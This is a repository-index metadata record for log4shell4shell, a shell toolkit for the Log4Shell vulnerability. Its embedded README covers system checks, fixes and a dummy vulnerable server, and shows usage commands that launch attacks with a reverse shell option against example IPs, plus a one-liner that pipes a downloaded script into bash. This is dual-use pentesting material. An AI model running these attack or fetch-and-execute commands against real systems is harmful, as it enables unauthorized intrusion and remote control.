{"id":24069636,"url":"https://github.com/suuhm/log4shell4shell","last_synced_at":"2025-10-13T18:42:36.472Z","repository":{"id":82086419,"uuid":"439151562","full_name":"suuhm/log4shell4shell","owner":"suuhm","description":"Log4shell - Multi-Toolkit. Find, Fix \u0026 Test possible CVE-2021-44228 vulneraries - provides a complete LOG4SHELL test/attack environment on shell","archived":false,"fork":false,"pushed_at":"2021-12-23T00:09:08.000Z","size":56,"stargazers_count":4,"open_issues_count":0,"forks_count":0,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-07-03T22:05:47.144Z","etag":null,"topics":["checker","hacking","linux","log4j","log4j2","log4shell","macos","patch","penetration-testing","pentesting","proof-of-concept","scanner","security","tomcat","vulnerability-scanners","windows"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/suuhm.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2021-12-16T23:13:09.000Z","updated_at":"2022-04-23T23:26:29.000Z","dependencies_parsed_at":null,"dependency_job_id":"9ecbed06-fe58-47ce-b188-32b0a3451602","html_url":"https://github.com/suuhm/log4shell4shell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/suuhm/log4shell4shell","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/suuhm%2Flog4shell4shell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/suuhm%2Flog4shell4shell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/suuhm%2Flog4shell4shell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/suuhm%2Flog4shell4shell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/suuhm","download_url":"https://codeload.github.com/suuhm/log4shell4shell/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/suuhm%2Flog4shell4shell/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":263410762,"owners_count":23462297,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["checker","hacking","linux","log4j","log4j2","log4shell","macos","patch","penetration-testing","pentesting","proof-of-concept","scanner","security","tomcat","vulnerability-scanners","windows"],"created_at":"2025-01-09T14:59:26.098Z","updated_at":"2025-10-13T18:42:31.441Z","avatar_url":"https://github.com/suuhm.png","language":"Shell","readme":"# log4shell4shell\nLog4j - Multitool. Find \u0026amp; fix possible CVE-2021-44228 vulneraries - provides a complete LOG4SHELL test/attack environment\n\n![Thumb](/logo_banner.png )\n\n# Features\n\n- Check your Linux/Mac/BSD and Windows System for CVE-2021-44228 vulneraries\n- Fix your system by deleting log4j java class / or setting some enviroment variables \n- Proof of Concept: you can run a dummy spring boot server for testing the exploit by yourself (https://github.com/christophetd/log4shell-vulnerable-app)\n- You can run a attack against a wished IP-Port and include a Base64 Command / Or A simple Reverse Shell\n- Full ip-range scanning by https://github.com/fullhunt/log4j-scan\n\n# How to Run on Linux/Mac/BSD:\n\n## Requirements:\n\n- https://docs.docker.com/get-docker/\n- Debian / Ubuntu: ```apt update ; apt install default-jre screen python3-pip bash curl```\n- OpenSuse: ```zypper ref ; zypper in default-jre screen python3-pip bash curl```\n- Redhead-Linux / CentOS: ```yum clean; yum install default-jre screen python3-pip bash curl```\n- BSD pkg: ```pkg install default-jre screen python3-pip curl```\n- Mac OS (Brew): ```/bin/bash -c \"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\" ; brew install default-jre screen python3 pip```\n\n## Quick check your system with this oneliner:\n\n```bash\nwget https://raw.githubusercontent.com/suuhm/log4shell4shell/main/log4shell4shell.sh -qO- | bash -s -- --check-system\n```\n\n## More Options\n### Run a sample attack against IP: 10.4.4.20 Port 8080 loginpage and additionally a Reverse Proxy Shell:\n\n```bash\ngit clone https://github.com/suuhm/log4shell4shell ; cd log4shell4shell\nmv log4shell4shell.sh l4s4s.sh \u0026\u0026 chmod +x l4s4s.sh\n./l4s4s.sh --run-attack http://10.4.4.20:8080/login.php -e\n```\nRun ```screen -r l4s4s-ldap-srv``` and/or ```screen -r l4s4s-nc-rsh``` to view some attacking infos in Exploit-Server shell: \n\n\n### Run a full scan  IP: 10.4.4.20 Port 8080 and additionally a try all tests :\n\n```bash\n./l4s4s.sh --python-scan \"-u 10.4.4.20:8080 --run-all-tests\"\n```\n\n### Run a Proof of Concept on a Tomcat Springboot Server:\n\n```bash\n./l4s4s.sh --run-dummy-server \u0026\u0026 \\\n./l4s4s.sh --run-attack http://127.0.0.1:4280 -e\n```\n\n### Run a Unifi-Controller Exploit Attack/Check (on 10.4.4.20:8443):\n\n```bash\n./l4s4s.sh --run-attack 10.4.4.20:8443 -e --unifi-post\n```\n\n## All available Options\n\n```bash\n_|                            _|  _|              _|                  _|  _|  _|  _|              _|                  _|  _|\n_|          _|_|      _|_|_|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|\n_|        _|    _|  _|    _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|\n_|        _|    _|  _|    _|      _|        _|_|  _|    _|  _|        _|  _|      _|        _|_|  _|    _|  _|        _|  _|\n_|_|_|_|    _|_|      _|_|_|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|\n                          _|\n                      _|_|\n\n\n \u003e Running Log4shell Framework \u0026 Check-Toolkit on shell v0.1a (C) 2021 suuhm\n\nWrong input! Please enter one of these options:\n\nUsage: ./l4s4s.sh [OPTIONS] \u003cIP:PORT|COMMAND\u003e\n\n                        --get-powershell-finder\n                        --check-system\n                        --fix-log4j\n                        --run-dummy-server \u003cJNDIExploit.*.zip\u003e\n                        --run-attack \u003cFORMAT: IP:PORT\u003e \u003c-e/-t/'cmd'\u003e [--unifi-post]\n                        --python-scan \u003ccommand\u003e\n\n```\n\n# How to upgrade your linux and/or macos python version:\n\nJust run my helper-script (--list-versions): ``` ./python-upgrader.sh ```\n\n# How to run on Windows x86 / x64:\n\nJust run in Powershell (admin-mode): ``` .\\set_windows_fix.ps1 ```\n\n\n# This script is alpha! So please let me know if you have some issues\n\n# Legal Disclaimer\n\nThe project log4shell4shell is made for educational and ethical testing purposes only. Usage of log4j-scan for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsuuhm%2Flog4shell4shell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsuuhm%2Flog4shell4shell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsuuhm%2Flog4shell4shell/lists"}